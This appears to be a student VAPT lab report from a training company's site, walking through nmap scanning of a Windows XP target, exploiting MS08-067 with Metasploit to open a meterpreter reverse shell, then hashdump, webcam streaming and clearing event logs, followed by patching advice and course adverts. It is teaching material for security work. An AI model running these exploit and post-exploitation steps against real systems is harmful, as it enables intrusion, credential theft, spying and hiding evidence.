Vulnerability Assessment & Penetration Testing Report | ICSS Student – Vivek Kumar

Vulnerability Assessment & Penetration

Testing Report 

[on Windows XP]

Vulnerability is a cyber-security term that refers to a flaw in a system that can leave it open to attack. A vulnerability may also refer to any type of weakness in a computer system itself, in a set of procedures, or in anything that leaves information security exposed to a threat.

Vulnerability Assessment & Penetration Testing Report done by ICSS Student Vivek Kumar. The full project discussed below:


Project Name: Vulnerability AssessmentPenetration testing

Author Name: Vivek Kumar

Publish Date:  24-07-2018


Table of  Contents



Vulnerability Scanning

Attack and Penetration


Solution & Recommendation





The first part of VAPT is information gathering about the target network or machine. In our case the target is a windows xp 2003 machine which is on the same network as me.

So at first we will run a nmap scan to see the live hosts.




Now we need to seperae out the live ip address so we will save the above result in a text file and then filter the ip address using the command –

nmap -sV -sP > host.txt cat host.txt | grep “for” | cut -d “ “ -f5 > ip.txt The output is :




Now we have to check which one of them is a windows xp machine so we will run an script which will detect the os of all the live ip’s.

nmap -sV -O -iL ip.txt > os.txt


and the output is :


Starting Nmap 7.70 ( ) at 2018-07-16 23:55 IST Nmap scan report for XiaoQiang (

Host is up (0.0013s latency). Not shown: 995 closed ports


53/tcp   open domain dnsmasq 2.71 80/tcp   open http    nginx (bad gateway) 8192/tcp open http                       Tengine httpd 8193/tcp open http                            nginx

8899/tcp open http    Tengine httpd

MAC Address: 78:11:DC:18:76:21 (Xiaomi Electronics,co.)

No exact OS matches for host (If you know what OS is running on it, see ).

TCP/IP fingerprint: OS:SCAN(V=7.70%E=4%D=7/16%OT=53%CT=1%CU=40355%PV=Y

%DS=1%DC=D%G=Y%M=7811DC%T OS:M=5B4CE349%P=i686-pc-linux- gnu)SEQ(SP=0%GCD=0%ISR=0%TI=Z%CI=Z%II=I%TS=7)

OS:OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11 NW7%O4=M5B4ST11NW7%O5=M5B4 OS:ST11NW7%O6=M5B4ST11)WIN(W1=3890%W2=3890%W3=3890

%W4=3890%W5=3890%W6=3890) OS:ECN(R=Y%DF=Y%T=40%W=3908%O=M5B4NNSNW7%CC=N% Q=)T1(R=Y%DF=Y%T=40%S=A%A=S+% OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0

%S=A%A=Z%F=R%O=%RD=0%Q=)T OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q

=)T6(R=Y%DF=Y%T=40%W=0%S=A%A= OS:Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=1 64%UN=0%RIPL=G%RID=G%RIPCK OS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)


Network Distance: 1 hop


Nmap scan report for


Host is up (0.041s latency). Not shown: 999 closed ports


22/tcp open ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)

MAC Address: F2:03:71:B7:A4:27 (Unknown) Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.12 – 4.10

Network Distance: 1 hop

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Nmap scan report for Host is up (0.017s latency).

All 1000 scanned ports on are closed

MAC Address: 64:CC:2E:96:75:69 (Xiaomi Communications) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop


Nmap scan report for Host is up (0.042s latency).

Not shown: 996 closed ports

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 2869/tcp open http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP) MAC Address: F2:03:71:B7:A4:27 (Unknown)

Device type: general purpose

Running: Microsoft Windows XP|2003

OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003

OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003

Network Distance: 1 hop

Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp


OS and Service detection performed. Please report any incorrect results at .

Nmap done: 5 IP addresses (4 hosts up) scanned in 60.99 seconds


The machine details marked in yellow is our target machine.


1 hop


Now with our target locked we will move to the next step.


Vulnerability Scanning


In this part we will scan the target for known vulerabilities so again we will use nmap to run a script which wil detect vulnerbility in the system.


nmap -Pn –script vuln > vuln.txt The output is :


Starting Nmap 7.60 ( ) at 2018-07-16 14:12 IST Nmap scan report for

Host is up (0.0022s latency). Not shown: 996 closed ports PORT STATE SERVICE

135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 2869/tcp open icslap


Host script results:

|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED

| smb-vuln-ms08-067:


|   Microsoft Windows system vulnerable to remote code execution (MS08- 067)

|     State: VULNERABLE

|     IDs:  CVE:CVE-2008-4250

|            The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,

|            Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary

|            code via a crafted RPC request that triggers the overflow during path canonicalization.


|     Disclosure date: 2008-10-23

|     References:




|_smb-vuln-ms10-054: false

|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)

| smb-vuln-ms17-010:


|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)

|     State: VULNERABLE

|     IDs: CVE:CVE-2017-0143

|     Risk factor: HIGH

|       A critical remote code execution vulnerability exists in Microsoft SMBv1

|         servers (ms17-010).


|     Disclosure date: 2017-03-14

|     References:


| guidance-for-wannacrypt-attacks/

|_ Nmap done: 1 IP address (1 host up) scanned in 17.10 seconds



The above result shows the list of vulnerabilities which are marked in yellow and they are as follows :


|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED


This vulnerability exist but it doesn’t provide any user access so it can’t be used. The next one is


smb-vuln-ms08-067: This vulnerability allows user to have remote access to the target system and it exist on windows xp 2003 machine which is our target.

Then the last one listed is smb-vuln-ms17-010:


This vulnerability also allows users to have remote access to the target system but it is not available for the windows xp 2003 machine it only exists in windows servers .


So now we will use the ms08_067 vulnerability to exploit the machine using Metasploit.


Attack and Penetration


To perform this attack we will use msfconsole. Metasploit framework has a huge collection of exploits,paylods and modules which are used by the hacking community.


So it can launched by typing msfconsle in the terminal.


Now we have search for the ms08_067 vulnerability. So we will type search ms08_067


Metasloit framework


The following commands will follow


use exploit/windows/smb/ms08_067_netapi show payloads

it will show a list of payloads which can be used to perform the attack. We are going to use windows/meterpreter/reverse_tcp payload


set payload windows/meterpreter/reverse_tcp


show options

set rhost  (target ip address) set lhost                                             (attacker ip address)





The final command to execute the attack is exploit







Once we get a meterpreter session we own the target machine now we can do any thing we want like we can escalete privilage by the command


To conform check the ip by typing ifconfig




we have a lot of options which we can get by typing help most common ones are

getsystem sysinfo getuid hashdump

webcam_stream download

cd ls



At last we need to clear our footprints using command clearev



Solution & Recommendation


This particular vulnerability was patched and released by the microsoft a long ago so just perform an windows update and this vulnerability will be atomatically patched.


One should always keep his/her system and progams updated .

This habit alone can give you a lot of protection as the latest updated softwares are unlikely to have any known vulnerability.


Also the windows xp pack is very old so user should upgrade to the latest os which is windows 10 . A good antivirus should be used and it should be upgraded regularly . Firewall should be kept on. Contact a professional to perform regular checks.


See the full process in video given below:





Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Computer Forensic Training in Kolkata

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Internet Of Things Training

Internet Of Things Training Hyderabad

Embedded System Training

Digital Marketing Training

Machine Learning Training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 


Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery


Other Location for Online Courses: